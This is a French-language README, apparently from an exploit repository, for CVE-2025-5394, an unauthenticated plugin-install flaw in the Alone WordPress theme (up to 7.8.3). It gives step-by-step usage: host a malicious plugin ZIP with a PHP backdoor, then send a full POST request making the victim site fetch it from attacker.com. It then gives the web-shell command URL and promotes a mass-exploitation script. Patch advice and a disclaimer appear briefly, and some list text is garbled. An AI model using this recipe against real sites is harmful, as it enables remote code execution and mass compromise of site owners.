
Alone – Thème WordPress caritatif polyvalent à but non lucratif <= 7.8.3 - Absence d'autorisation permettant le téléchargement arbitraire de fichiers non authentifié via l'installation de plugins
🔥 Résumé de la vulnérabilité
Le thème WordPress Alone versions <= 7.8.3 est vulnérable à une vulnérabilité de téléchargement arbitraire de fichier non authentifié. Cette faille permet à des attaquants non authentifiés de télécharger et d'installer des fichiers ZIP de plugins arbitraires depuis des URL distantes via un point de terminaison AJAX non protégé — entraînant une exécution de code à distance (RCE) en déployant des plugins malveillants.
Cette vulnérabilité provient de la fonction beplus_import_pack_install_plugin exposée publiquement via wp_ajax_nopriv_ sans aucune vérification d'authentification ou de capacité. La fonction installe et active un plugin à partir d'une URL fournie par l'utilisateur.
🔍 Thème concerné
🧪 Fonctionnalités de l'exploit
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 Chercheur
🚀 Utilisation
Préparez un fichier ZIP de plugin malveillant hébergé sur un serveur que vous contrôlez.
Plugin Name:) et une backdoor PHP (par exemple bk.php)Construisez la requête POST suivante :
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
En cas de succès, le plugin est installé et activé. Accédez à votre shell à l'adresse :
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 Script d'exploitation de masse Ce dépôt inclut un outil d'exploitation de masse avec :
result.txtVoir mass_beplus_exploit.py pour plus de détails.
🛠 Recommandations de correctif
wp_ajax_nopriv_beplus_import_pack_install_plugin.current_user_can('install_plugins'))🔒 Avertissement :
Ces informations sont fournies uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès ou l'utilisation non autorisée de systèmes informatiques est illégal et contraire à l'éthique.
📚 Référence :
CVE: CVE-2025-5394
Chercheur : Thai An